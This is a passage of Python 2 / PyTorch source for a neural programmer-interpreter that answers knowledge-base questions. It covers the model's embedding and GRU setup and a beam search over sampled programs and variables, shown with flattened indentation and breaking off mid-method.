# program_to_argtype_table contains a list of list of integers of dimension num_programs x max_arguments
self.program_to_argtype_table = None
# self.argument_type_table contains a parameter "ArgumentType_Embedding".
# No "Argument_Keys" is needed because argument types are determined by the program itself by looking up the self.
# program_to_argtype_table. ArgumentType_Embedding is of dimension num_argtypes x argtype_embed_dim
self.argumenttype_embedding = None
# self.variable_table contains a parameter "Variable_Embedding" and "Variable_Keys".
# Variable tables are 2-way table i.e. for every argument type, there is a list (of maximum upto) N variables of that type.
# So Variable_Keys is of dimension number_of_argtypes x batch_size x max_num_var x var_key_dim (var_key_dim being used to Id the variable)
# and "Variable_Embedding" being of dimension num_argtypes x batch_size x max_num_var x var_embed_dim
self.variable_embedding = None
self.variable_keys = None
# self.variable_mask is of dimension num_argtypes x batch_size x max_num_var
self.variable_mask = None
# self.variable_atten_table contains the attention over all variables
# declared till now. is of dimension num_argtypes x max_num_var
self.variable_atten_table = None
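        # Illustrative shape note (added comment): with hypothetical sizes such as
        # num_argtypes = 5, batch_size = 2, max_num_var = 3, var_key_dim = 4 and
        # var_embed_dim = 8 (example values, not defaults read from params), the
        # per-beam Variable_Keys tensor would be [5, 2, 3, 4], Variable_Embedding
        # would be [5, 2, 3, 8], and variable_mask ([5, 2, 3]) marks which of the
        # 3 variable slots per argument type are populated for each batch element.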
self.kb_attention = None
assert self.beam_size <= self.num_programs_to_sample * self.num_variables_to_sample
self.keep_prob = params['dropout_keep_prob']
self.global_program_indices_matrix = None
self.dont_look_back_attention = params['dont_look_back_attention']
self.concat_query_npistate = params['concat_query_npistate']
self.query_attention = params['query_attention']
self.forced_normalize_ir = bool(1-params['normalize_length'])
self.dtype_float = torch.float
self.dtype_int64 = torch.long
if torch.cuda.is_available():
self.device = torch.device("cuda")
torch.set_default_tensor_type('torch.cuda.FloatTensor')
else:
self.device = torch.device("cpu")
print 100*"$"
print self.device
print 100*"$"
#if self.device=="cuda":
#torch.int32 = torch.cuda.int32
#torch.float32 = torch.cuda.float32
#torch.int64 = torch.cuda.int64
#print 'changed dtypes to cuda'
def create_cell_scopes():
self.dropout = nn.Dropout(1-self.keep_prob)
self.elu = nn.ELU()
self.batch_normalizer = nn.BatchNorm1d(self.npi_core_dim+self.var_embed_dim)
self.npi_scope = "npi_scope"
self.npi_rnn = nn.GRU(input_size=self.npi_core_dim+self.var_embed_dim, \
hidden_size=self.npi_core_dim, batch_first=False)
self.env_scope = "env_scope"
self.env_rnn = nn.GRU(input_size=self.var_embed_dim, hidden_size=self.env_dim, batch_first=False)
self.sentence_scope = "sentence_scope"
self.sentence_rnn = nn.GRU(input_size=self.wikidata_embed_dim+self.text_embed_dim, \
hidden_size=self.cell_dim, batch_first=True)
self.reset_scope = 'reset_scope'
self.reset_layer = nn.Linear(self.npi_core_dim, self.npi_core_dim)
self.state_encoding_scope_1 = 'state_encoding_scope_layer1'
self.state_encoding_layer1 = nn.Linear(self.npi_core_dim+self.var_embed_dim, self.hidden_dim)
self.state_encoding_scope_2 = 'state_encoding_scope_layer2'
self.state_encoding_layer2 = nn.Linear(self.hidden_dim, self.hidden_dim)
self.state_encoding_scope_3 = 'state_encoding_scope_layer3'
self.state_encoding_layer3 = nn.Linear(self.hidden_dim, self.state_dim)
self.phase_change_scope = 'phase_change_scope'
self.phase_change_layer = nn.Linear(self.npi_core_dim, 1)
self.prog_key_scope1 = 'prog_net_fcc1'
if self.concat_query_npistate:
self.prog_key_layer1 = nn.Linear(self.npi_core_dim+self.var_embed_dim+self.cell_dim, self.prog_key_dim)
else:
self.prog_key_layer1 = nn.Linear(self.npi_core_dim+self.var_embed_dim, self.prog_key_dim)
self.prog_key_scope2 = 'prog_net_fcc2'
self.prog_key_layer2 = nn.Linear(self.prog_key_dim, self.prog_key_dim)
self.inp_var_key_scope = 'inp_var_key_scope'
self.inp_var_key_layer = nn.Linear(self.max_num_var, self.var_key_dim)
self.get_target_var_key_and_embedding_arg_scope = 'get_target_var_key_and_embedding_arg_scope'
self.target_var_key_and_embedding_arg_layer = nn.ModuleList([nn.Linear(2*self.argtype_embed_dim, self.argtype_embed_dim) \
for i in xrange(self.max_arguments)])
self.get_target_var_key_and_embedding_var_scope = 'get_target_var_key_and_embedding_var_scope'
self.target_var_key_and_embedding_var_layer = nn.ModuleList([nn.Linear(2*self.var_embed_dim, self.var_embed_dim) \
for i in xrange(self.max_arguments)])
self.get_target_var_key_and_embedding_targetembed_scope = 'get_target_var_key_and_embedding_targetembed_scope'
self.target_var_key_and_embedding_targetembed_layer = nn.Linear(self.var_embed_dim+self.argtype_embed_dim+\
self.prog_embed_dim, self.var_embed_dim)
self.get_target_var_key_and_embedding_targetkey_scope = 'get_target_var_key_and_embedding_targetkey_scope'
self.target_var_key_and_embedding_targetkey_layer = nn.Linear(self.var_embed_dim+self.argtype_embed_dim+\
self.prog_embed_dim, self.var_key_dim)
self.update_attention_scope = 'update_attention_scope'
self.update_attention_layer = nn.ModuleList([nn.Linear(self.max_num_var+self.npi_core_dim,self.max_num_var) \
for i in xrange(self.num_argtypes)])
self.batch_ids = torch.arange(0,self.batch_size,dtype = self.dtype_int64, device=self.device)
# tensor is of dimension batch_size x 1 i.e. [0, 1, 2, ... batch_size]
rel_embedding_mat = torch.tensor(rel_embedding, device=self.device, dtype=self.dtype_float)
self.rel_embedding = nn.Embedding(rel_embedding.shape[0], rel_embedding.shape[1], _weight=rel_embedding_mat)
type_embedding_mat = torch.tensor(type_embedding, device=self.device)
self.type_embedding = nn.Embedding(type_embedding.shape[0], type_embedding.shape[1], _weight=type_embedding_mat)
max_val = 6. / np.sqrt(self.cell_dim + self.wikidata_embed_dim)
self.query_rel_atten = nn.Parameter(torch.tensor(np.random.normal(-max_val, max_val, [self.cell_dim, self.wikidata_embed_dim]), \
requires_grad=True, device=self.device))
word_embeddings_mat = torch.tensor(vocab_embed, device=self.device, dtype=self.dtype_float)
self.word_embeddings = nn.Embedding(vocab_embed.shape[0], vocab_embed.shape[1], _weight=word_embeddings_mat)
self.enc_scope_text = "encoder_text"
max_val = 6. / np.sqrt(self.num_progs + self.prog_embed_dim)
program_embedding_mat = torch.tensor(np.random.normal(-max_val, max_val, [self.num_progs, self.prog_embed_dim]), \
device=self.device, dtype=self.dtype_float)
self.program_embedding = nn.Embedding(self.num_progs, self.prog_embed_dim, _weight=program_embedding_mat)
max_val = 6. / np.sqrt(1 + self.hidden_dim)
self.query_attention_h_mat = nn.Parameter(torch.tensor(np.random.normal(-max_val, max_val, [1, self.hidden_dim]), \
requires_grad=True, device=self.device, dtype=self.dtype_float))
max_val = 6. / np.sqrt(self.wikidata_embed_dim + self.var_embed_dim)
self.preprocessed_var_emb_mat = nn.Parameter(torch.tensor(np.random.normal(-max_val, max_val, \
[self.wikidata_embed_dim, self.var_embed_dim]), \
requires_grad=True, device=self.device, \
dtype=self.dtype_float))
max_val = 6. / np.sqrt(self.num_progs + self.prog_key_dim)
self.init_state = nn.Parameter(torch.zeros([1, self.cell_dim],requires_grad=True,device=self.device, dtype=self.dtype_float))
self.program_keys = nn.Parameter(torch.tensor(np.random.normal(-max_val, max_val, [self.num_progs, self.prog_key_dim]), \
requires_grad=True, device=self.device, dtype=self.dtype_float))
self.program_to_argtype_table = torch.tensor(program_to_argtype_table, device=self.device, \
dtype=self.dtype_int64)
self.program_to_targettype_table = torch.tensor(program_to_targettype_table,
device=self.device, dtype=self.dtype_int64)
max_val = 6. /np.sqrt(self.num_argtypes + self.argtype_embed_dim)
argtype_embedding_mat = torch.tensor(np.random.normal(-max_val, max_val, \
[self.num_argtypes, self.argtype_embed_dim]), \
device=self.device, dtype=self.dtype_float)
self.argtype_embedding = nn.Embedding(self.num_argtypes, self.argtype_embed_dim, _weight=argtype_embedding_mat)
self.program_to_num_arguments = torch.max(input=self.one_hot(self.program_to_argtype_table,depth=self.num_argtypes),dim=1)[0]
#program_to_num_arguments is of dimension num_progs x num_argtypes
# accomodating for the beam_size
create_cell_scopes()
def get_parameters(self):
return (self.program_keys, self.program_embedding, self.word_embeddings, \
self.argtype_embedding, self.query_attention_h_mat)
def create_placeholder(self):
self.encoder_text_inputs_w2v = None
self.encoder_text_inputs_kb_emb = None
self.preprocessed_var_mask_table = [[None]*self.max_num_var]*self.num_argtypes
self.preprocessed_var_emb_table = [[None]*self.max_num_var]*self.num_argtypes
self.kb_attention = None
self.progs_phase_1 = None
self.progs_phase_2 = None
self.gold_target_type = None
self.randomness_threshold_beam_search = None
self.DoPruning = None
self.last_step_feasible_program = None
self.bias_prog_sampling_with_target = None
self.bias_prog_sampling_with_last_variable = None
self.required_argtypes = None
self.relaxed_reward_multipler = None
self.IfPosIntermediateReward = None
self.mask_IntermediateReward = None
self.IntermediateReward = None
def manual_gather_nd(self, params,indices):
param_shape = list(params.shape)
#print param_shape
number_of_axes = indices.shape[-1]
f_indices = self.map_index_to_flattened(indices,param_shape[0:number_of_axes])
f_params = params.contiguous().view([-1]+param_shape[number_of_axes:]) #this reshaping cannot be avoided
return torch.index_select(f_params,0,f_indices)
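    # Illustrative note (added comment): manual_gather_nd above mimics
    # tf.gather_nd for the leading axes.  As a hypothetical example, params of
    # shape [4, 5, 6] with indices of shape [7, 2] selects along the first two
    # axes and yields a tensor of shape [7, 6]: the index pairs are flattened
    # by map_index_to_flattened and then used with torch.index_select on the
    # reshaped params.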
def get_final_feasible_progs_for_last_timestep(self, feasible_progs, beam_properties, beam_id, feasible_progs_for_last_timestep, t):
if t == self.num_timesteps-1:
feasible_progs_for_last_timestep = feasible_progs_for_last_timestep.type(feasible_progs[beam_id].dtype)
#feasible_progs[beam_id] = tf.add(feasible_progs[beam_id], tf.zeros_like(feasible_progs[beam_id]))
temp = torch.where((self.gold_target_type==beam_properties['target_type'][beam_id]), \
torch.ones_like(self.gold_target_type, device=self.device), \
torch.zeros_like(self.gold_target_type, device=self.device))
current_equal_to_gold_target_type = torch.unsqueeze(temp, dim=1).repeat([1, self.num_progs]).type(feasible_progs[beam_id].dtype)
#current_equal_to_gold_target_type is of size batch_size x num_progs
t1 = self.one_hot(torch.zeros([self.batch_size], device=self.device), depth=self.num_progs)
t2 = self.one_hot((self.num_progs-1)*torch.ones([self.batch_size], device=self.device), depth=self.num_progs)
temp = (t1 + t2).type(feasible_progs[beam_id].dtype)
#temp is of size batch_size x num_progs
feasible_progs_for_last_timestep = current_equal_to_gold_target_type*temp + (1-temp)*feasible_progs_for_last_timestep
temp2 = (1-self.last_step_feasible_program)*feasible_progs[beam_id] + \
self.last_step_feasible_program*torch.mul(feasible_progs[beam_id], feasible_progs_for_last_timestep)
temp3 = torch.unsqueeze(torch.sum((1-temp)*temp2, dim=1),dim=1).repeat([1,self.num_progs])
#temp3 is of dimension batch_size x num_progs
feasible_progs[beam_id] = torch.where((temp3==0), feasible_progs[beam_id], temp2)
return feasible_progs[beam_id]
def forward(self, feed_dict):
#with tf.device(tf.test.gpu_device_name()):
with torch.no_grad():
self.variable_embedding = []
self.variable_keys = []
self.variable_atten_table = []
self.variable_mask = []
max_val = 6. / np.sqrt(self.max_num_var)
for beam_id in xrange(self.beam_size):
self.variable_embedding.append(torch.zeros([self.num_argtypes, self.batch_size, \
self.max_num_var, self.var_embed_dim], \
device=self.device))
self.variable_keys.append(torch.zeros([self.num_argtypes, self.batch_size, \
self.max_num_var, self.var_key_dim], \
device=self.device))
temp = torch.zeros([self.num_argtypes, self.batch_size, self.max_num_var], device=self.device)
self.variable_atten_table.append(list(torch.unbind(temp, dim=0)))
self.variable_mask.append(torch.zeros([self.num_argtypes, self.batch_size, self.max_num_var], \
device=self.device))
self.encoder_text_inputs_w2v = torch.tensor(feed_dict['encoder_text_inputs_w2v'], \
device=self.device, dtype=self.dtype_int64)
self.preprocessed_var_mask_table = [[torch.tensor(feed_dict['preprocessed_var_mask_table'][i][j], \
device=self.device, dtype=self.dtype_float) \
for j in range(self.max_num_var)] for i in range(self.num_argtypes)]
self.preprocessed_var_emb_table = [[torch.tensor(feed_dict['preprocessed_var_emb_table'][i][j], \
device=self.device, dtype=self.dtype_float) \
for j in range(self.max_num_var)] for i in range(self.num_argtypes)]
self.encoder_text_inputs_kb_emb = torch.tensor(feed_dict['encoder_text_inputs_kb_emb'], \
device=self.device, dtype=self.dtype_float)
self.kb_attention = torch.tensor(feed_dict['kb_attention'], device=self.device, dtype=self.dtype_float)
self.progs_phase_1 = torch.tensor(feed_dict['progs_phase_1'], device=self.device, dtype=self.dtype_int64)
self.progs_phase_2 = torch.tensor(feed_dict['progs_phase_2'], device=self.device, dtype=self.dtype_int64)
self.gold_target_type = torch.tensor(feed_dict['gold_target_type'], device=self.device, dtype=self.dtype_int64)
self.randomness_threshold_beam_search = torch.tensor(feed_dict['randomness_threshold_beam_search'], \
device=self.device, dtype=self.dtype_float)
self.DoPruning = torch.tensor(feed_dict['DoPruning'], device=self.device, dtype=self.dtype_float)
self.last_step_feasible_program = torch.tensor(feed_dict['last_step_feasible_program'], \
device=self.device, dtype=self.dtype_float)
self.bias_prog_sampling_with_last_variable = torch.tensor(feed_dict['bias_prog_sampling_with_last_variable'], \
device=self.device, dtype=self.dtype_float)
self.bias_prog_sampling_with_target = torch.tensor(feed_dict['bias_prog_sampling_with_target'], \
device=self.device, dtype=self.dtype_float)
self.required_argtypes = torch.tensor(feed_dict['required_argtypes'], device=self.device, dtype=self.dtype_int64)
self.relaxed_reward_multipler = torch.tensor(feed_dict['relaxed_reward_multipler'], device=self.device, \
dtype=self.dtype_float)
sentence_state, attention_states = self.sentence_encoder()
beam_properties = defaultdict(list)
beam_properties['Model_Reward_Flag'] = [torch.zeros([self.batch_size], device=self.device) \
for beam_id in xrange(self.beam_size)]
for beam_id in xrange(self.beam_size):
beam_properties['Model_Reward_Flag'][beam_id] = self.add_preprocessed_output_to_variable_table(beam_id)
init_h_states, init_e_state, init_target_var_embedding = self.reset_state(sentence_state)
unswitched_beam_properties = defaultdict(list)
beam_properties['h_states'] = [init_h_states for beam_id in xrange(self.beam_size)]
beam_properties['h'] = [None for beam_id in xrange(self.beam_size)]
beam_properties['e_state'] = [init_e_state for beam_id in xrange(self.beam_size)]
beam_properties['target_var_embedding'] = [init_target_var_embedding for beam_id in xrange(self.beam_size)]
beam_properties['prog_sampled_indices'] = [None for beam_id in xrange(self.beam_size)]
beam_properties['input_var_sampled_indices'] = [None for beam_id in xrange(self.beam_size)]
unswitched_beam_properties['total_beam_score'] = [torch.zeros([self.batch_size], device=self.device)] + \
[-30*torch.ones([self.batch_size], device=self.device) \
for beam_id in xrange(self.beam_size-1)]
#beam_properties['total_beam_score'] = [tf.zeros([self.batch_size]) for beam_id in xrange(self.beam_size)]
beam_properties['terminate'] = [torch.zeros([self.batch_size,1], device=self.device) \
for beam_id in xrange(self.beam_size)]
beam_properties['length'] = [torch.zeros([self.batch_size,1], device=self.device) \
for beam_id in xrange(self.beam_size)]
beam_properties['target_type'] = [torch.zeros([self.batch_size], device=self.device, dtype=self.dtype_int64) \
for beam_id in xrange(self.beam_size)]
beam_properties['phase_elasticity'] = [torch.ones([self.batch_size,1], device=self.device) for beam_id in xrange(self.beam_size)]
beam_properties['program_argument_table_index'] = [torch.ones([self.batch_size, self.num_progs,
int(math.pow(self.max_num_var,self.max_arguments))], device=self.device) for beam_id in xrange(self.beam_size)]
beam_properties['query_attentions_till_now'] = [torch.zeros([self.batch_size,self.max_len], device=self.device) for beam_id in xrange(self.beam_size)]
self.debug_beam_terminate = defaultdict(list)
beam_properties['none_count'] = [torch.zeros([self.batch_size,1], device=self.device) for beam_id in xrange(self.beam_size)]
# beam_properties['check_penalization'] = [torch.zeros([self.batch_size,1], device=self.device) for beam_id in xrange(self.beam_size)]
to_return_per_step_prob = -1*torch.ones([self.batch_size,self.beam_size,self.num_timesteps], device=self.device)
#[-1*tf.ones([self.batch_size, self.beam_size]) for time_step in xrange(self.num_timesteps)]
to_return_sequence_logprob = torch.zeros([self.batch_size, self.beam_size], device=self.device)
# this should finally contain a tensor of batch_size x beam_size
to_return_action_sequence = dict.fromkeys(['program_type','argument_type','target_type',\
'target_table_index','argument_table_index'])
for key in ['program_type','argument_type','target_type','target_table_index','argument_table_index']:
to_return_action_sequence[key] = [[] for beam_id in xrange(self.beam_size)]
self.entropy = torch.tensor(0, device=self.device, dtype=self.dtype_float)
feasible_progs_for_last_timestep = self.get_feasible_progs_for_last_timestep()
for t in xrange(self.num_timesteps):
entropy = torch.tensor(0, device=self.device, dtype=self.dtype_float)
# =============================================================================
current_beam_score = [score+0 for score in unswitched_beam_properties['total_beam_score']]
if t > 0:
beam_properties['phase_elasticity'] = [self.phase_change_net(h.view([self.batch_size, -1]),t, old_p_el) \
for h,old_p_el in zip(beam_properties['h'], beam_properties['phase_elasticity'])]
feasible_progs = self.get_feasible_progs(t, beam_properties['phase_elasticity'])
to_penalize_beams = [torch.zeros([self.batch_size,self.num_actions], device=self.device) for beam_id in xrange(self.beam_size)]
for beam_id in xrange(self.beam_size):
beam_properties['e_state'][beam_id] = self.env_encoding(beam_properties['e_state'][beam_id], \
beam_properties['target_var_embedding'][beam_id])[1]
[beam_properties['h'][beam_id],
beam_properties['h_states'][beam_id]] = self.npi_core(beam_properties['h_states'][beam_id], \
beam_properties['e_state'][beam_id], \
beam_properties['target_var_embedding'][beam_id])
feasible_progs[beam_id] = self.get_final_feasible_progs_for_last_timestep(feasible_progs, \
beam_properties, beam_id, feasible_progs_for_last_timestep, t)
[prog_sampled_probs, prog_sampled_indices, \
prog_sampled_embeddings, kb_attention_for_sampled_progs, \
beam_properties['query_attentions_till_now'][beam_id]] = self.prog_net(beam_properties['h'][beam_id],
sentence_state, attention_states,
beam_properties['query_attentions_till_now'][beam_id], \
feasible_progs[beam_id], \
self.num_programs_to_sample, \
beam_properties['terminate'][beam_id], \
beam_properties['target_type'][beam_id])
# prog_sampled_probs batch_size x num_programs_to_sample
# prog_sampled_indices batch_size x num_programs_to_sample
# prog_sampled_embeddings is a tensor of shape batch_size x num_programs_to_sample x prog_embedding_dim
                    # kb_attention_for_sampled_progs is a num_programs_to_sample-length list of flat tensors, each of size max_var * max_var * max_var
beam_properties['prog_sampled_indices'][beam_id] = prog_sampled_indices
complete_action_probs = []
# for every sampled program will contain the probability of action obtained by sampling every possible var
per_program_input_var_sampled_indices = []
#for every sampled program will contain the possible variable samples
for _prog_sample_, _prog_embedding_, \
_kb_attention_for_sampled_progs_ , \
_program_prob_ in zip(list(torch.unbind(prog_sampled_indices, dim = 1)),\
list(torch.unbind(prog_sampled_embeddings, dim = 1)),\
list(torch.unbind(kb_attention_for_sampled_progs, dim = 0)),\
list(torch.unbind(prog_sampled_probs, dim = 1))):
arg_types = self.argument_type_net(_prog_sample_)[0]
past_program_variables = self.manual_gather_nd(beam_properties['program_argument_table_index'][beam_id], \
torch.cat([torch.unsqueeze(self.batch_ids, dim=1), torch.unsqueeze(_prog_sample_, dim=1)], dim=1))
#past_program_variables is of dimension batch_size x (max_arguments * max_num_var)
input_var_sampled_probs, input_var_sampled_indices = self.input_var_net(beam_properties['h'][beam_id],\
arg_types, _prog_sample_, _prog_embedding_,\
_kb_attention_for_sampled_progs_, \
beam_id, self.num_variables_to_sample, \
beam_properties['terminate'][beam_id], \
past_program_variables)[0:-1]
# input_var_sampled_indices has shape batch_size x num_variables_to_sample
# input_var_sampled_probs has shape batch_size x num_variables_to_sample
per_program_input_var_sampled_indices.append(input_var_sampled_indices)
complete_action_probs.append(torch.mul(input_var_sampled_probs, _program_prob_.view([-1,1])))
beam_properties['input_var_sampled_indices'][beam_id] = torch.stack(per_program_input_var_sampled_indices, dim=1)
# beam_properties['input_var_sampled_indices'] is beam_sized list containing tensors of
# shape batch_size x num_programs_to_sample x num_variables_to_sample
complete_action_probs = torch.stack(complete_action_probs, dim=1)
#complete_action_probs is a tensor of shape batch_size x num_progs_to_sample x num_vars_to_sample
complete_action_probs = complete_action_probs.view([self.batch_size,-1])
#complete_action_probs is a tensor of shape batch_size x num_actions.
# each program and joint_variables selectiont becomes an action
complete_action_probs = torch.clamp(complete_action_probs,self.eps,0.9)
log_complete_action_probs = torch.log(complete_action_probs)
entropy = entropy+ (-1*torch.sum(complete_action_probs*log_complete_action_probs))
if self.params['normalize_length'] is 1:
if t is 0:
current_beam_score[beam_id] = log_complete_action_probs + torch.unsqueeze(current_beam_score[beam_id],dim=1)
else:
score_if_terminated = log_complete_action_probs + torch.unsqueeze(current_beam_score[beam_id],dim=1)
power = 0.4
n1 = torch.pow(beam_properties['length'][beam_id], power)/torch.pow(beam_properties['length'][beam_id]+1.0, power)
n2 = 1.0/torch.pow(beam_properties['length'][beam_id]+1.0, power)
score_if_not_terminated = n2*log_complete_action_probs + n1*torch.unsqueeze(current_beam_score[beam_id],dim=1)
old_cbs = torch.unsqueeze(current_beam_score[beam_id],dim=1)*torch.ones_like(log_complete_action_probs, device=self.device)
current_beam_score[beam_id] = beam_properties['terminate'][beam_id]*score_if_terminated + \
(1-beam_properties['terminate'][beam_id])*score_if_not_terminated
current_beam_score[beam_id] = torch.where(current_beam_score[beam_id]>old_cbs, old_cbs,current_beam_score[beam_id])
else:
current_beam_score[beam_id] = log_complete_action_probs + torch.unsqueeze(current_beam_score[beam_id],dim=1)
if self.params['none_decay'] is 1:
power_decay = 0.2
penalize_factor = torch.mul(beam_properties['none_count'][beam_id].type(self.dtype_float),\
-1*torch.log(torch.tensor(math.pow(t+1,power_decay), device=self.device)*
torch.ones_like(beam_properties['none_count'][beam_id], device=self.device, dtype=self.dtype_float)))
current_beam_score[beam_id] = current_beam_score[beam_id]+penalize_factor
beam_target_type = beam_properties['target_type'][beam_id].view([self.batch_size, 1])
beam_gold_type = self.gold_target_type.view([self.batch_size, 1])
beam_if_terminated = beam_properties['terminate'][beam_id]
if self.params['prune_beam_type_mismatch'] is 1:
# print self.DoPruning, "$___DoPruning___$"
toadd = self.DoPruning*self.check_if_gold_target(beam_target_type, beam_gold_type, beam_if_terminated, t)
# toadd = self.check_if_gold_target(beam_target_type, beam_gold_type, beam_if_terminated, t)
to_penalize_beams[beam_id] = toadd+to_penalize_beams[beam_id]
# print 100*"#"
# print to_penalize_beams[0]
# print 100*"#"
# beam_properties['check_penalization'][beam_id] = to_penalize_beams[beam_id]
if t > 0:
penalize_none_start = torch.where(beam_target_type==0,\
torch.ones_like(beam_target_type, device=self.device),torch.zeros_like(beam_target_type, device=self.device)).type(self.dtype_float)
to_penalize_beams[beam_id] = penalize_none_start + to_penalize_beams[beam_id]
to_penalize_beams[beam_id] = torch.clamp(to_penalize_beams[beam_id],0,1)
current_beam_score[beam_id] = torch.clamp(current_beam_score[beam_id],2*math.log(self.eps),0)
self.entropy = self.entropy+entropy
current_score = torch.stack(current_beam_score,dim = 1)
#current_score is a tensor of shape batch_size x beam_size x num_actions
to_penalize_score = torch.stack(to_penalize_beams,dim = 1)
# flag_penalize = torch.min(to_penalize_score,dim=1,keepdim=True)[0]
flag_penalize = torch.prod(to_penalize_score,dim=1,keepdim=True)
to_penalize_score = to_penalize_score * (1-flag_penalize)
to_penalize_score = math.log(self.eps)*to_penalize_score
current_score = current_score+to_penalize_score
current_score = torch.clamp(current_score,2*math.log(self.eps),0)
self.debug_beam_terminate['current_score'].append(current_score)
current_score = current_score.view([self.batch_size,-1])
top_scores, indices_top_scores = torch.topk(current_score, k = self.beam_size)
# top_scores has shape batch_size x beam_size
# indices_top_scores has shape batch_size x beam_size
to_return_sequence_logprob = top_scores+0
#to_return_sequence_logprob has shape batch_size x beam_size
old_score = torch.stack(unswitched_beam_properties['total_beam_score'])
#need to transform this old_score w.r.t changes in beam_id
#old_score has shape beam_size x batch_size
#updating the score list
unswitched_beam_properties['total_beam_score'] = list(torch.unbind(top_scores,dim = 1))
new_beam_ids, action_ids = self.map_index_to_unflattened(indices_top_scores, [self.beam_size, self.num_actions])
#new_beam_ids has shape batch_size x beam_size
# action_ids has shape batch_size x beam_size
action_ids = torch.transpose(action_ids, 1,0)
# action_ids has shape beam_size x batch_size
# updating the memory w.r.t beams
new_beam_ids = torch.transpose(new_beam_ids,1,0)
#new_beam_ids has shape beam_size x batch_size
self.debug_beam_terminate['new_beam_ids'].append(new_beam_ids)
#updating old_score w.r.t change in beam_ids
old_score = self.beam_switch(old_score, new_beam_ids)
# =============================================================================
# updating the to_return_per_step_prob w.r.t beam_id changes
if t > 0:
old_prop_val = to_return_per_step_prob+0
old_prop_val = torch.transpose(old_prop_val, 1,0)
to_return_per_step_prob = self.beam_switch(old_prop_val, new_beam_ids)
to_return_per_step_prob = torch.transpose(to_return_per_step_prob, 1,0)
# ______________________________________________________________________________
################################################################################
# =============================================================================
# For Printing Per Step Prob
delta_score = to_return_sequence_logprob-torch.transpose(old_score, 1,0)
current_probs = torch.exp(delta_score)
multiplier = self.one_hot(t*torch.ones([self.batch_size, self.beam_size], device=self.device), depth = self.num_timesteps, dtype=self.dtype_float)
additand = torch.mul(multiplier, current_probs.view([self.batch_size, self.beam_size,1]).repeat(1,1,self.num_timesteps))
additand2 = torch.mul(to_return_per_step_prob,1-multiplier)
to_return_per_step_prob = additand2+additand
# ______________________________________________________________________________
################################################################################
self.debug_beam_terminate['to_return_per_step_prob'].append(to_return_per_step_prob)
self.debug_beam_terminate['to_return_sequence_logprob'].append(torch.exp(to_return_sequence_logprob))
# =============================================================================
# updating the beam_properties w.r.t beam_id changes
for prop in beam_properties.keys():
old_prop_val = torch.stack(beam_properties[prop],dim=0)
# each beam_prop will be of shape beam_size x batch_size x Tensor_shape
new_prop_val = self.beam_switch(old_prop_val, new_beam_ids)
beam_properties[prop] = list(torch.unbind(new_prop_val, dim = 0))
# ______________________________________________________________________________
###############################################################################
# =============================================================================
# updating the variable properties corresponding to beams w.r.t beam_id changes
# variable_properties are :-
#variable_embedding - beam_size x [num_argtypes, batch_size, max_num_var, var_embed_dim]
#variable_keys - beam_size x [num_argtypes, batch_size, max_num_var, var_key_dim]
#variable_mask - beam_size x [num_argtypes, batch_size, max_num_var]
#variable_atten_table - beam_size x num_argtypes x [batch_size, max_num_var]
# keeping in mind beam_size
#1)variable_embedding
old_prop_val = torch.stack(self.variable_embedding, dim=0)
old_prop_val = old_prop_val.permute([0,2,1,3,4])
# now old_prop_val has shape beam_size x batch_size x (tensor_shape = num_argtypes x max_num_var x var_embed_dim)
new_prop_val = self.beam_switch(old_prop_val, new_beam_ids)
self.variable_embedding = list(torch.unbind(new_prop_val.permute([0,2,1,3,4]), dim = 0))
# variable_embedding beam_size x [num_argtypes, batch_size, max_num_var, var_embed_dim]
#2)variable_keys
old_prop_val = torch.stack(self.variable_keys, dim=0)
# old_prop_val [beam_size, num_argtypes, batch_size, max_num_var, var_key_dim]
old_prop_val = old_prop_val.permute([0,2,1,3,4])
new_prop_val = self.beam_switch(old_prop_val, new_beam_ids)
self.variable_keys = list(torch.unbind(new_prop_val.permute([0,2,1,3,4]), dim = 0))
# variable_keys beam_size x [num_argtypes, batch_size, max_num_var, var_key_dim]
#3)variable_mask
old_prop_val = torch.stack(self.variable_mask, dim=0)
# old_prop_val [beam_size, num_argtypes, batch_size, max_num_var]
old_prop_val = old_prop_val.permute([0,2,1,3])
new_prop_val = self.beam_switch(old_prop_val, new_beam_ids)
self.variable_mask = list(torch.unbind(new_prop_val.permute([0,2,1,3]), dim = 0))
# variable_mask beam_size x [num_argtypes, batch_size, max_num_var]
#4)variable attention table
#variable_atten_table - beam_size x num_argtypes x [batch_size, max_num_var]
old_prop_val = []
for beam_id in xrange(self.beam_size):
old_prop_val.append(torch.stack(self.variable_atten_table[beam_id], dim=1))
old_prop_val = torch.stack(old_prop_val, dim = 0)
# old_prop_val [beam_size, batch_size, num_argtypes, max_num_var]
new_prop_val = self.beam_switch(old_prop_val, new_beam_ids)
temp = list(torch.unbind(new_prop_val.permute([0,2,1,3]), dim = 0))
self.variable_atten_table = [list(torch.unbind(_temp_, dim = 0)) for (beam_id, _temp_) in \
zip(xrange(self.beam_size), temp)]
# variable_atten_table beam_size x num_argtypes x [batch_size, max_num_var]
# done updating beam_memory
# done updating variable_memory
# ______________________________________________________________________________
###############################################################################
# =============================================================================
# have to update to_return_action_* w.r.t. the change in beam_id
if t > 0:
for key in ['program_type','argument_type','target_type','target_table_index','argument_table_index']:
# to_return_action_sequence beam_size x seq_length x [tensor_shape]
old_prop_val = []
for beam_id in xrange(self.beam_size):
temp = torch.stack(to_return_action_sequence[key][beam_id], dim=1)
# temp [seq_length x tensor_shape]
old_prop_val.append(temp)
old_prop_val = torch.stack(old_prop_val, dim = 0)
# beam_size x batch_size x seq_length x tensor_shape
new_prop_val = self.beam_switch(old_prop_val, new_beam_ids)
temp = torch.unbind(new_prop_val, dim = 0)
to_return_action_sequence[key] = [list(torch.unbind(_temp_, dim = 1)) for (beam_id, _temp_) in \
zip(xrange(self.beam_size), temp)]
#print key, ':: to_return_action_sequence[',key,']', to_return_action_sequence[key]
# done updating to_return_action_* w.r.t. the change in beam_id
# _____________________________________________________________________________
###############################################################################
# =============================================================================
#getting the pointer to program sample and pointer to variable sample from action_id
[pointer_to_prog_sample, \
pointer_to_variable_sample] = self.map_index_to_unflattened(action_ids,[self.num_programs_to_sample,\
self.num_variables_to_sample])
# pointer_to_prog_sample has shape beam_size x batch_size
# pointer_to_variable_sample has shape beam_size x batch_size
# getting the actual program samples
# pointer_to_prog_sample beam_size x batch_size
multiplicand_2 = torch.stack(beam_properties['prog_sampled_indices'], dim = 0)
#multiplicand_2 beam_size x batch_size x num_programs_to_sample
multiplicand_1 = self.one_hot(pointer_to_prog_sample, depth=self.num_programs_to_sample, dtype=multiplicand_2.dtype)
#multiplicand_1 beam_size x batch_size x num_programs_to_sample
true_program_sample = torch.sum(torch.mul(multiplicand_1, multiplicand_2), dim = 2)
